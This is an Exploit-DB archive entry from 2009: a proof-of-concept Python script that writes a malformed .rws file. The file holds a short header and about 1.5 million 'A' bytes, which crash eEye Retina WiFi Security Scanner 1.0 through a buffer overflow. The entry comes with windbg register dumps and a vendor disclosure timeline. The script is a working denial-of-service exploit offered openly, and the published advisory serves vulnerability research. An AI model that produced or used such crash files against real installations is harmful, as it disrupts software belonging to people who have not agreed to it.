eEye Retina WiFi Security Scanner 1.0 - '.rws Parsing' Buffer Overflow (PoC)

EDB-ID:

9114

Author:

LiquidWorm

Type:

dos

Platform:

Windows

Published:

2009-07-10

#!/usr/bin/python
#
#
# * Title: Retina WiFi Security Scanner 1.0 (.rws parsing) Buffer Overflow Vulnerability
#
#
# * Summary: Retina WiFi Scanner is a tool to be used to detect IEEE 802.11 (WiFi) based devices.
# * Vendor: eEye Digital Security Inc.
# * Product Web Page: http://www.eeye.com/
# * Current Version: 1.0.8.68
# * Notiz: The tool is implemented as part of the eEye's Retina Network Security Scanner package.
# * Tested On Microsoft Windows XP Professional SP3 (English)
#
# * Vulnerability Discovered By Gjoko 'LiquidWorm' Krstic
# * liquidworm gmail com
# * http://www.zeroscience.org
# * 16.05.2009
#
# * Original Advisory: http://www.zeroscience.org/codes/retinawifi_bof.txt
# * eEye Advisory: http://research.eeye.com/html/advisories/published/AD20090710.html
#
#
# * --------------------------------windbg---------------------------------- *
#
# (1268.dd8): Access violation - code c0000005 (first chance)
# First chance exceptions are reported before any exception handling.
# This exception may be expected and handled.
# eax=41414141 ebx=00000003 ecx=000006d8 edx=00000000 esi=0000006c edi=10264da0
# eip=1001dcce esp=0012e72c ebp=0012e754 iopl=0         nv up ei pl nz na pe nc
# cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010206
# *** Defaulted to export symbols for [path]\WiFiCore.dll - 
# WiFiCore!LibWifi_ReportHTML+0x1b48e:
# 1001dcce f644300401      test    byte ptr [eax+esi+4],1     ds:0023:414141b1=??
# 0:000> g
# (1268.dd8): Access violation - code c0000005 (first chance)
# First chance exceptions are reported before any exception handling.
# This exception may be expected and handled.
# eax=00000010 ebx=41414141 ecx=00000000 edx=41414141 esi=00001000 edi=41414150
# eip=7c809eda esp=00121484 ebp=001214b0 iopl=0         nv up ei pl zr na pe nc
# cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010246
# *** Defaulted to export symbols for [path]\kernel32.dll - 
# kernel32!IsBadReadPtr+0x39:
# 7c809eda 8a02            mov     al,byte ptr [edx]          ds:0023:41414141=??
#
# * -------------------------------/windbg---------------------------------- *
#
#
# * Disclosure Timeline:
#
# * [16.05.2009] Vulnerability discovered.
# * [16.05.2009] Initial contact with the vendor with description included + screenshot + proof
#		 of concept code.
# * [18.05.2009] Vendor contacted again for confirmation of the vulnerability because of no reply
#		 from previous e-mail.
# * [18.05.2009] Vendor replied and acknowledged the vulnerability. Patch development process in
#		 progress.
# * [25.05.2009] Vendor contacted for information on patch development and its release process
#		 because of our advisory disclosure policy.
# * [29.05.2009] Vendor contacted again for information on patch development because of no reply
#		 from previous e-mail.
# * [29.05.2009] Vendor answered. Bug fixes scheduled within next week.
# * [08.06.2009] Vendor contacted for an accurate date of a patch release or scheduled bug fix
#		 time line information.
# * [08.06.2009] Vendor replied and confirmed that the vulnerability has been mitigated and passed
#		 the QA. The fix will be introduced in the next release of the product. Scheduled
#		 date for the release of the update is not yet known...or...it's unknown  :) .
# * [12.06.2009] Vendor informs that the fix will be released along with the new scheduled release
#		 of the Retina package approximately on 29th of June.
# * [29.06.2009] Contacted the vendor, asked for a more accurate (fixed) date of the release.
# * [29.06.2009] Vendor says that the patch is being tested by the QA team along with other program
# *		 fixes. Vendor will contact me after the tests, with the results from the same.
# * [06.07.2009] Sent an e-mail to the vendor stating that the advisory is planned to be published
# *		 on 10th of july because of internal company reasons.
# * [10.07.2009] Vendor releases patch: http://download.eeye.com/html/products/retinawireless/
# * [10.07.2009] Public advisory released.
#
#
#
# * Pozdrav Do:
#
# * sm, thricer, drowsy, Jayji, Leon Juranic,
# * teppei, n3tpr0b3, DrunkY, apo, Aodrulez,
# * kokanin, e.wiZz!, j0rgan, str0ke, Uploader,
# * Jonathan Salwan, Sergio 'shadown' Alvarez,
# * Malformation, dz0, d3, Greg Linares, lio,
# * mio, drown, dni, Damjan, Maximiliano Soler,
# * leetgeek, Preddy, Gliser, eSDee i t.d.  :) 
#
#
# * Proof Of Concept:
#


#=========================================*snip*=========================================#


header = (
	 "\x52\x57\x53"
	 "\x30\x31\x30"
	 "\x19\x52\x76"
	 "\x00"
	 )

buffer = "\x41" * 1574624	#[Bytes/chars]
				#1574622 No issues
				#1574623 BoF, Access violation when reading [random]
				#1574624 BoF, Access violation when reading [414141B1]
				#...

payload = header + buffer

file = "Abulia.rws"

filetzio=open(file,'w')
filetzio.write(payload)
filetzio.close()

print "\n[+] File " + file + " successfully landed.\n"


#=========================================*snip*=========================================#




#################################################################################
#										#
# * Disclaimer:									#
#										#
# * This  document and all the information it contains are provided "as is",	#
# * for educational purposes only, without warranty of any kind, whether	#
# * express or implied.								#
#										#
# * The  author reserves the right not to be responsible for the topicality,	#
# * correctness, completeness or quality of the information provided in		#
# * this document. Liability claims regarding damage caused by the use of	#
# * any information provided, including any kind of information which is	#
# * incomplete or incorrect, will therefore be rejected.			#
#										#
#################################################################################

# milw0rm.com [2009-07-10]